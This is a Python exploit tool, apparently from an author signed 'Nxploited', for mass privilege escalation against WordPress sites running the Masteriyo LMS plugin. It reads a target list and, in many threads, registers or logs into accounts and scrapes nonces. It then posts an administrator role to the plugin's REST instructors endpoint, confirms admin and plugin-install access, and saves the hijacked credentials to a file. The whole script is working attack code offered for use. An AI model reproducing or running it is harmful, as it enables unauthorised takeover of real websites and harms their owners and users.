#!/usr/bin/env python3 # By: Nxploited import os import sys import time import html as _html_mod from datetime import datetime from typing import Tuple, Optional, List, Any from urllib.parse import urlparse import requests import re import json as _json try: from colorama import Fore, Back, Style, init as colorama_init colorama_init(autoreset=True) except Exception: class _D: RESET = "" RED = "" GREEN = "" YELLOW = "" CYAN = "" MAGENTA = "" BLUE = "" WHITE = "" BRIGHT = "" DIM = "" Fore = _D() Back = _D() Style = _D() requests.packages.urllib3.disable_warnings() TERM_WIDTH = 80 LOGIN_ADMIN_FILE = "Login_admin.txt" # ====================================================================== # BASIC HELPERS / BANNER / LOGGING # ====================================================================== def center(text: str, width: int = TERM_WIDTH) -> str: text = text.rstrip("\n") length = len(text) if length >= width: return text pad = (width - length) // 2 return " " * pad + text def print_banner() -> None: os.system("cls" if os.name == "nt" else "clear") banner_lines = [ r" ___ _ ___ __ __ __ __ __ ", r" / (_)(_| |_// (_) / )/ \/ )/ | | | | / \| | ", r" | | | \__ /| | /| __ |__|_|__|_\__/|__|_", r" | | | / -----/ | |/ |/ \-----| | / \ | ", r" \___/ \_/ \___/ /___\__//___\__/ | | \__/ | ", r" ", ] main_color = Fore.CYAN + Style.BRIGHT accent = Fore.MAGENTA + Style.BRIGHT for line in banner_lines: print(main_color + center(line) + Style.RESET_ALL) print() print(accent + center("By: Nxploited | Telegram: @KNxploited") + Style.RESET_ALL) print() def log_line(prefix: str, color: str, msg: str, style: str = "") -> None: print(f"{color}{style}{prefix}{Style.RESET_ALL} {msg}") def log_info(msg: str) -> None: log_line("[INFO] ", Fore.CYAN, msg, Style.DIM) def log_warn(msg: str) -> None: log_line("[WARN] ", Fore.YELLOW, msg) def log_err(msg: str) -> None: log_line("[FAIL] ", Fore.RED, msg) def log_ok(msg: str) -> None: log_line("[OK] ", Fore.GREEN, msg, Style.BRIGHT) def log_dead(msg: str) -> None: log_line("[DEAD] ", Fore.MAGENTA, msg, Style.DIM) # ====================================================================== # HTTP / SESSION / PATHS # ====================================================================== BASE_HEADERS = { "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Cache-Control": "no-cache", "Pragma": "no-cache", "Upgrade-Insecure-Requests": "1", "Connection": "keep-alive", } UA_POOL = [ "Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0", "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0", "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 " "(KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36", ] ACCOUNT_PATH = "/account/" SIGNUP_PATH = "/account/signup/" REGISTER_POST_PATH = "/st/" DASHBOARD_PATH = "/account/#/dashboard" AJAX_PATH = "/wp-admin/admin-ajax.php" REST_ESCALATE_TEMPLATE = "/wp-json/masteriyo/v1/users/instructors/{user_id}" def get_ua() -> str: import random return random.choice(UA_POOL) def build_headers(referer: Optional[str] = None) -> dict: h = dict(BASE_HEADERS) h["User-Agent"] = get_ua() h["DNT"] = "1" h["Sec-Fetch-Site"] = "same-origin" h["Sec-Fetch-Mode"] = "navigate" h["Sec-Fetch-User"] = "?1" h["Sec-Fetch-Dest"] = "document" if referer: h["Referer"] = referer return h def normalize_url(url: str) -> str: url = url.strip() if not url.startswith(("http://", "https://")): url = "http://" + url p = urlparse(url) return f"{p.scheme}://{p.netloc}" def new_session(timeout: int) -> requests.Session: s = requests.Session() s.verify = False s.timeout = timeout adapter = requests.adapters.HTTPAdapter(pool_connections=50, pool_maxsize=50, max_retries=1) s.mount("http://", adapter) s.mount("https://", adapter) return s def has_wordpress_logged_in_cookie(session: requests.Session) -> bool: for c in session.cookies: if c.name.startswith("wordpress_logged_in_"): return True return False # ====================================================================== # STRONG NONCE EXTRACTION # ====================================================================== def extract_all_nonces(html: str) -> dict: nonces = {} def add(source: str, key: str, value: str): key = key.strip() value = value.strip() if not key or not value: return if key not in nonces: nonces[key] = set() nonces[key].add(value) html_unescaped = _html_mod.unescape(html) variants = [ html_unescaped, html_unescaped.replace("\\\"", "\""), html_unescaped.replace("\\'", "'"), ] regex_patterns = [ (r'name=["\']_wpnonce["\'][^>]*value=["\']([^"\']+)["\']', "_wpnonce"), (r'value=["\']([^"\']+)["\'][^>]*name=["\']_wpnonce["\']', "_wpnonce"), (r'id=["\']_wpnonce["\'][^>]*value=["\']([^"\']+)["\']', "_wpnonce"), (r'["\']_wpnonce["\']\s*[:=]\s*["\']([^"\']+)["\']', "_wpnonce"), (r'["\']nonce["\']\s*[:=]\s*["\']([^"\']+)["\']', "nonce"), (r'["\']wp_rest["\']\s*[:=]\s*["\']([^"\']+)["\']', "wp_rest"), (r'\\"_wpnonce\\"\s*[:=]\s*\\"([^"]+)\\"', "_wpnonce_escaped_dq"), (r'\\"nonce\\"\s*[:=]\s*\\"([^"]+)\\"', "nonce_escaped_dq"), (r'\\"wp_rest\\"\s*[:=]\s*\\"([^"]+)\\"', "wp_rest_escaped_dq"), (r"\\'_wpnonce\\'\s*[:=]\s*\\'([^']+)\\'", "_wpnonce_escaped_sq"), (r"\\'nonce\\'\s*[:=]\s*\\'([^']+)\\'", "nonce_escaped_sq"), (r"\\'wp_rest\\'\s*[:=]\s*\\'([^']+)\\'", "wp_rest_escaped_sq"), (r'["\']([A-Za-z0-9_\-]*nonce[A-Za-z0-9_\-]*)["\']\s*[:=]\s*["\']([^"\']+)["\']', "__GENERIC_NONCE_PAIR__"), (r'\\"([A-Za-z0-9_\-]*nonce[A-Za-z0-9_\-]*)\\"\s*[:=]\s*\\"([^"]+)\\"', "__GENERIC_NONCE_PAIR_ESCAPED_DQ__"), (r"\\'([A-Za-z0-9_\-]*nonce[A-Za-z0-9_\-]*)\\'\s*[:=]\s*\\'([^']+)\\'", "__GENERIC_NONCE_PAIR_ESCAPED_SQ__"), ] for text in variants: for pat, fixed_key in regex_patterns: for m in re.finditer(pat, text, re.IGNORECASE | re.DOTALL): if fixed_key.startswith("__GENERIC_NONCE_PAIR"): key = m.group(1) value = m.group(2) add("regex_generic", key, value) else: value = m.group(1) add("regex", fixed_key, value) return nonces def get_best_login_nonce(html: str) -> Optional[str]: nonces = extract_all_nonces(html) for k in ["_wpnonce", "nonce", "login_nonce"]: if k in nonces and nonces[k]: return next(iter(nonces[k])) for k in nonces: if "nonce" in k.lower() and nonces[k]: return next(iter(nonces[k])) return None def get_best_signup_nonce(html: str) -> Optional[str]: nonces = extract_all_nonces(html) for k in ["_wpnonce", "signup_nonce", "registration_nonce"]: if k in nonces and nonces[k]: return next(iter(nonces[k])) for k in nonces: if "nonce" in k.lower() and nonces[k]: return next(iter(nonces[k])) return None # ====================================================================== # DASHBOARD CONTEXT (Masteriyo nonce/id) # ====================================================================== def extract_dashboard_context(html: str) -> Tuple[Optional[str], Optional[str]]: user_id = None nonce = None m_uid = re.search(r'"current_user_id"\s*:\s*"(\d+)"', html, re.IGNORECASE) if m_uid: user_id = m_uid.group(1) m_nonce = re.search(r'"nonce"\s*:\s*"([A-Za-z0-9]{4,64})"', html, re.IGNORECASE) if m_nonce: nonce = m_nonce.group(1) return user_id, nonce # ====================================================================== # ADMIN CHECK HELPERS (FROM Big.py) # ====================================================================== def get_random_user_agent(): return get_ua() def verify_admin_access_sync(session: requests.Session, url: str, timeout: int) -> bool: try: admin_urls = [ f"{url}/wp-admin/", f"{url}/wp-admin/index.php", f"{url}/wp-admin/users.php" ] for admin_url in admin_urls: try: headers = {'User-Agent': get_random_user_agent()} response = session.get(admin_url, timeout=timeout, verify=False, headers=headers, allow_redirects=False) if response.status_code == 200: content = response.text.lower() if any(indicator in content for indicator in [ 'dashboard', 'wp-admin-bar', 'adminmenu', 'manage_options', 'users.php', 'plugins.php', 'themes.php', 'wp-admin/index.php' ]): return True elif response.status_code in [301, 302]: location = response.headers.get('Location', '') if 'wp-login.php' in location: return False except: continue return False except: return False def verify_plugin_installation_access_sync(session: requests.Session, url: str, timeout: int): try: plugin_install_urls = [ f"{url}/wp-admin/plugin-install.php", f"{url}/wp-admin/plugin-install.php?tab=upload", f"{url}/wp-admin/plugins.php?page=plugin-install" ] for plugin_url in plugin_install_urls: try: headers = {'User-Agent': get_random_user_agent()} response = session.get(plugin_url, timeout=timeout, verify=False, headers=headers, allow_redirects=False) if response.status_code == 200: content = response.text.lower() installation_indicators = [ 'plugin-install-tab', 'upload-plugin', 'plugin-upload-form', 'install-plugin-upload', 'pluginzip', 'browse plugins', 'add plugins' ] if any(indicator in content for indicator in installation_indicators): return True, plugin_url, "Plugin installation page accessible" elif response.status_code in [301, 302]: location = response.headers.get('Location', '') if 'wp-login.php' in location: return False, plugin_url, "Redirected to login - no admin access" except: continue return False, None, "No plugin installation access found" except: return False, None, "Error checking plugin installation access" def is_admin_session(base: str, session: requests.Session, timeout: int) -> bool: label = base admin_ok = verify_admin_access_sync(session, base, timeout) plugin_ok, purl, pdetail = verify_plugin_installation_access_sync(session, base, timeout) if admin_ok and plugin_ok: log_ok(f"{label} :: ADMIN SESSION VERIFIED (dashboard + plugin-install access).") return True if plugin_ok: log_ok(f"{label} :: ADMIN SESSION (plugin-install access): {purl}") return True if admin_ok: log_ok(f"{label} :: ADMIN SESSION (dashboard indicators only).") return True log_warn(f"{label} :: LOGIN OK but no admin/plugin-install access detected.") return False # ====================================================================== # LOGIN LOGIC (MASTERIYO AJAX, NO ADMIN CHECK HERE) # ====================================================================== def masteriyo_login( base: str, session: requests.Session, timeout: int, username_or_email: str, password: str ) -> Tuple[bool, str]: label = base account_url = base.rstrip("/") + ACCOUNT_PATH ajax_url = base.rstrip("/") + AJAX_PATH try: r_get = session.get(account_url, headers=build_headers(account_url), timeout=timeout, verify=False) except Exception as e: log_dead(f"{label} :: /account/ GET error: {e}") return False, f"account_get_failed:{e}" if r_get.status_code != 200: log_dead(f"{label} :: /account/ HTTP {r_get.status_code}") return False, f"account_get_status_{r_get.status_code}" wpnonce = get_best_login_nonce(r_get.text) if not wpnonce: log_warn(f"{label} :: LOGIN :: no suitable nonce found in /account/") return False, "login_no_wpnonce" account_url_clean = account_url.rstrip("/") data = { "action": "masteriyo_login", "_wpnonce": wpnonce, "_wp_http_referer": ACCOUNT_PATH, "username": username_or_email, "password": password, "redirect_to": account_url_clean, } headers_post = build_headers(account_url) headers_post["Content-Type"] = "application/x-www-form-urlencoded" try: r_post = session.post(ajax_url, data=data, headers=headers_post, timeout=timeout, verify=False) except Exception as e: log_dead(f"{label} :: AJAX login POST error: {e}") return False, f"ajax_post_failed:{e}" try: j = r_post.json() msg = j.get("data", {}).get("message", "") if j.get("success"): log_ok(f"{label} :: LOGIN OK :: {msg or 'success'}") else: log_warn(f"{label} :: LOGIN FAIL :: {msg or 'unknown error'}") except Exception: body_preview = (r_post.text or "")[:300].replace("\n", " ") log_warn(f"{label} :: LOGIN RAW RESPONSE :: {body_preview}") if not has_wordpress_logged_in_cookie(session): return False, "login_no_logged_in_cookie" return True, "login_ok" # ====================================================================== # REGISTRATION (Nx_1) # ====================================================================== def masteriyo_register( base: str, session: requests.Session, timeout: int, username: str, email: str, password: str ) -> Tuple[bool, str]: label = base signup_url = base.rstrip("/") + SIGNUP_PATH st_url = base.rstrip("/") + REGISTER_POST_PATH try: r_get = session.get(signup_url, headers=build_headers(signup_url), timeout=timeout, verify=False) except Exception as e: log_dead(f"{label} :: /account/signup/ GET error: {e}") return False, f"signup_get_failed:{e}" if r_get.status_code != 200: log_dead(f"{label} :: /account/signup/ HTTP {r_get.status_code}") return False, f"signup_get_status_{r_get.status_code}" wpnonce = get_best_signup_nonce(r_get.text) if not wpnonce: log_warn(f"{label} :: REGISTER :: no suitable nonce found in /account/signup/") return False, "signup_no_wpnonce" local_part = email.split("@")[0] or username data = { "remember": "true", "_wpnonce": wpnonce, "first-name": local_part, "last-name": "user", "username": username, "email": email, "password": password, "confirm-password": password, "masteriyo-registration": "yes", } headers_post = build_headers(signup_url) headers_post["Content-Type"] = "application/x-www-form-urlencoded" try: r_post = session.post(st_url, data=data, headers=headers_post, timeout=timeout, verify=False) except Exception as e: log_dead(f"{label} :: /st/ POST (register) error: {e}") return False, f"signup_post_failed:{e}" body = (r_post.text or "").lower() if "email is already registered" in body or "user already exists" in body or "username is already taken" in body: log_warn(f"{label} :: REGISTER :: email/username already registered.") return True, "signup_email_or_user_already_registered" if "check your email" in body or "verify your email" in body or "activation email" in body: log_warn(f"{label} :: REGISTER :: email verification likely required.") return True, "registered_needs_email_verification" if "registration complete" in body or "account created" in body or "successfully registered" in body: log_ok(f"{label} :: REGISTER :: registration complete.") return True, "registered_ok" log_warn(f"{label} :: REGISTER :: response unclear.") return True, "registered_unclear" # ====================================================================== # DASHBOARD + ESCALATE (MASTERIYO REST) # ====================================================================== def masteriyo_fetch_dashboard_context( base: str, session: requests.Session, timeout: int ) -> Tuple[Optional[str], Optional[str]]: label = base dash_url = base.rstrip("/") + DASHBOARD_PATH try: r = session.get(dash_url, headers=build_headers(dash_url), timeout=timeout, verify=False, allow_redirects=True) except Exception as e: log_dead(f"{label} :: dashboard GET failed: {e}") return None, None if r.status_code != 200: log_dead(f"{label} :: dashboard HTTP {r.status_code}") return None, None user_id, nonce = extract_dashboard_context(r.text) if user_id and nonce: log_ok(f"{label} :: DASHBOARD :: user_id={user_id} nonce={nonce}") return user_id, nonce log_warn(f"{label} :: DASHBOARD :: cannot extract user_id/nonce.") return None, None def masteriyo_escalate_admin( base: str, session: requests.Session, timeout: int, user_id: str, nonce: str ) -> Tuple[bool, str, Any]: label = base url = base.rstrip("/") + REST_ESCALATE_TEMPLATE.format(user_id=user_id) headers = build_headers(url) headers["Content-Type"] = "application/json" headers["X-WP-Nonce"] = nonce payload = {"roles": ["administrator"]} try: r = session.post(url, headers=headers, data=_json.dumps(payload), timeout=timeout, verify=False) except Exception as e: log_dead(f"{label} :: ESCALATE POST error: {e}") return False, f"escalate_post_failed:{e}", "" body = r.text or "" try: j = r.json() roles = j.get("roles") or [] if "administrator" in roles: username = j.get("username", "") log_ok(f"{label} :: ESCALATE SUCCESS :: user_id={user_id} username={username} roles={roles}") return True, "escalate_admin_ok_json", j else: log_warn(f"{label} :: ESCALATE FAIL :: roles={roles}") return False, "escalate_no_admin_in_roles_json", j except Exception: if '"roles":["administrator"' in body: log_ok(f"{label} :: ESCALATE SUCCESS (TEXT MATCH).") return True, "escalate_admin_ok_text", body log_warn(f"{label} :: ESCALATE FAIL :: no administrator in response.") return False, "escalate_invalid_json_and_no_text_match", body # ====================================================================== # WRITE SUCCESS LINE # ====================================================================== def write_success_line( base: str, login_name: str, password: str, ) -> None: """ EXACT format: https://site.com/wp-login.php user:admin|pass:admin """ p = urlparse(base) login_url = f"{p.scheme}://{p.netloc}/wp-login.php" line = f"{login_url} user:{login_name}|pass:{password}\n" out_file = LOGIN_ADMIN_FILE if "/" in out_file: os.makedirs(os.path.dirname(out_file), exist_ok=True) with open(out_file, "a", encoding="utf-8") as f: f.write(line) # ====================================================================== # PER-SITE FLOWS (Nx_1 / Nx_2) WITH POST-ESCALATION ADMIN CHECK # ====================================================================== def handle_site_nx1( site: str, timeout: int, username: str, email: str, password: str, ) -> None: base = normalize_url(site) sess = new_session(timeout) reg_ok, reg_detail = masteriyo_register(base, sess, timeout, username, email, password) if not reg_ok: log_warn(f"{base} :: Nx_1 :: REGISTER FAIL ({reg_detail})") return login_ok, login_detail = masteriyo_login(base, sess, timeout, email, password) if not login_ok: return user_id, nonce = masteriyo_fetch_dashboard_context(base, sess, timeout) if not user_id or not nonce: return esc_ok, esc_detail, esc_resp = masteriyo_escalate_admin(base, sess, timeout, user_id, nonce) if not esc_ok: return # بعد التصعيد: نبدأ جلسة جديدة ونسجّل دخول مرّة أخرى ونتحقق أنه أدمن post_sess = new_session(timeout) post_login_ok, _ = masteriyo_login(base, post_sess, timeout, email, password) if not post_login_ok: log_warn(f"{base} :: POST-ESCALATION LOGIN FAILED (Nx_1).") return if is_admin_session(base, post_sess, timeout): write_success_line(base, email, password) def handle_site_nx2( site: str, timeout: int, login_name: str, password: str, ) -> None: base = normalize_url(site) sess = new_session(timeout) login_ok, login_detail = masteriyo_login(base, sess, timeout, login_name, password) if not login_ok: return user_id, nonce = masteriyo_fetch_dashboard_context(base, sess, timeout) if not user_id or not nonce: return esc_ok, esc_detail, esc_resp = masteriyo_escalate_admin(base, sess, timeout, user_id, nonce) if not esc_ok: return # بعد التصعيد: جلسة جديدة + تسجيل دخول + تحقق من أنه أدمن post_sess = new_session(timeout) post_login_ok, _ = masteriyo_login(base, post_sess, timeout, login_name, password) if not post_login_ok: log_warn(f"{base} :: POST-ESCALATION LOGIN FAILED (Nx_2).") return if is_admin_session(base, post_sess, timeout): write_success_line(base, login_name, password) # ====================================================================== # CLI # ====================================================================== def ask(prompt: str, default: str = "") -> str: if default: s = input(f"{Fore.CYAN}{prompt}{Style.RESET_ALL} [{default}]: ").strip() return s if s else default return input(f"{Fore.CYAN}{prompt}{Style.RESET_ALL}: ").strip() def ask_int(prompt: str, default: int) -> int: s = ask(prompt, str(default)) try: return int(s) except Exception: return default def print_modes() -> None: title_color = Back.BLUE + Fore.WHITE + Style.BRIGHT print(title_color + center(" MODES ", TERM_WIDTH) + Style.RESET_ALL) print() print(Fore.YELLOW + Style.BRIGHT + " Nx_1" + Style.RESET_ALL + " => Register + Login + Escalate") print(Fore.GREEN + Style.BRIGHT + " Nx_2" + Style.RESET_ALL + " => Login + Escalate (existing accounts)") print() def run() -> None: print_banner() print_modes() print(Fore.MAGENTA + Style.BRIGHT + "Modes:" + Style.RESET_ALL) print(" 1) Nx_1 => Register + Login + Exploit") print(" 2) Nx_2 => Login + Exploit (only)") mode = ask_int("Select mode (1=Nx_1, 2=Nx_2)", 2) if mode not in (1, 2): log_warn("Invalid mode, defaulting to Nx_2 (2).") mode = 2 tfile = ask("Targets list file (one host/URL per line)", "list.txt") if not os.path.exists(tfile): log_err(f"Targets file not found: {tfile}") sys.exit(1) threads = ask_int("Threads (concurrent sites)", 5) timeout = ask_int("HTTP timeout (seconds)", 10) if mode == 1: username = ask("Username to register (Nx_1)", "Nxploited") email = ask("Email to use for registration+login (Nx_1)", "user@example.com") password = ask("Password to use (Nx_1)", "Nx_admin") login_name = None else: username = None email = None login_name = ask("Username or Email for login+escalation (Nx_2)", "admin") password = ask("Password for that user", "admin") targets: List[str] = [] with open(tfile, "r", encoding="utf-8", errors="ignore") as f: for line in f: line = line.strip() if not line: continue targets.append(line) if not targets: log_err("Targets file is empty.") sys.exit(1) log_info(f"Loaded {len(targets)} targets.") start = time.time() from concurrent.futures import ThreadPoolExecutor, as_completed with ThreadPoolExecutor(max_workers=threads) as ex: futures = [] for site in targets: try: _ = urlparse(site) except Exception: log_warn(f"{site} :: invalid URL/host string, skipping.") continue if mode == 1: fut = ex.submit(handle_site_nx1, site, timeout, username, email, password) else: fut = ex.submit(handle_site_nx2, site, timeout, login_name, password) futures.append(fut) try: for _ in as_completed(futures): pass except KeyboardInterrupt: log_warn("Interrupted by user, shutting down threads...") ex.shutdown(wait=False, cancel_futures=True) sys.exit(1) elapsed = time.time() - start log_ok(f"Finished in {elapsed:.2f}s") log_ok(f"Successful admin escalations written to: {LOGIN_ADMIN_FILE}") if __name__ == "__main__": run()